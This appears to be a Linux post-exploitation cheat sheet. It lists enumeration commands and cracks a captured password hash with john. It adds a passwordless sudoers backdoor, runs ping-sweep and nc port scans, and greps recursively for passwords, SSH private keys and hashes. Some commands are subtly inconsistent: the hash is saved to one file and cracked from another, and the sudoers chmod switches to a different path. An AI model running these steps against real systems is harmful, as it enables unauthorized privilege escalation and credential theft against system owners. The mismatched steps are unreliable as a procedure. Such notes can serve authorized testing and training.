Enumeration
Basic
Host Info
uname -a
Check Environment
env
Check user permissions
sudo -l
Check hostname
hostname -I
Check the internal network
ifconfig
User with shells
grep "sh$" /etc/passwd
Check Ownership by group
find / -group management 2>/dev/null
Check processes
ps auxww
Check mounted devices
mount
Container processes
ps auxww | grep docker
ps auxww | grep lxd
Read crontab file
cat /etc/crontab
Check Services running
ls /etc/init.d
Check System info
uname -a
Check groups file
cat /etc/group
adm
group can read log files.
cat /var/log
Show listening ports
netstat -tuln
netstat -tnl
Listen to the localhost
netstat -an -p tcp
Check binaries with capabilities
getcap -r / 2>/dev/null
SUID/SETGID binaries
find / -perm -4000 -or -perm -2000 2>/dev/null
Traces library function calls
ltrace ProgramName
Search Kernel for Exploits
searchsploit "Linux Kernel" | grep <version>
/etc/shadow
Create the Hash file
echo 'zoe:$y$j9T$Ct0y5TNQ/sv95CFPz510O/$7YtCDOBISfngZeQ3rsDkRcw2XTFDgHBkxDpuhyBLNO1:1002:1002:zoe:/home/zoe:/bin/bash' > shadowHash.txt
Crack the hash
john --wordlist=~/Documents/Wordlists/rockyou.txt shadow.txt --format=crypt
/etc/sudoers
Try to read it
cat /etc/sudoers
If the file is read-only, you need to change its permissions to allow write access:
chmod +w /etc/sudoers
Add the following line:
yourUser ALL=(ALL) NOPASSWD: ALL
Restore the original file permissions to make it read-only again:
chmod 440 /mnt/etc/sudoers
Scan the local network
Find one many hosts there are in the network by doing a
ping sweep
:
for i in {1..254}; do (ping -c 1 192.168.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
If
nc
is installed can be use to scan for open ports:
nc -zv 192.168.0.1 1-65535 2>&1 | grep -v refused | tee scan
UDP scan
nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused
Credential Hunting
Passwords
Passwords
Search for the string
pass
(case-insensitive) in all files and directories recursively:
grep -iR "pass" * 2>/dev/null
Search for the string
password
in files with double extension, recursively:
grep password .*.* -r 2>/dev/null
Search for
ssh
keys recursively from the current directory you are in:
grep -iR -E "(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)" * 2>/dev/null
Hashes
Hashes
MD5 hashes
grep -aPo '[a-fA-F0-9]{32}' /DESIRED/PATH
SHA-1
grep -aPo '[a-fA-F0-9]{40}' /DESIRED/PATH
SHA-256
grep -aPo '[a-fA-F0-9]{64}' /DESIRED/PATH
SHA-512
grep -aPo '[a-fA-F0-9]{128}' /DESIRED/PATH
Last updated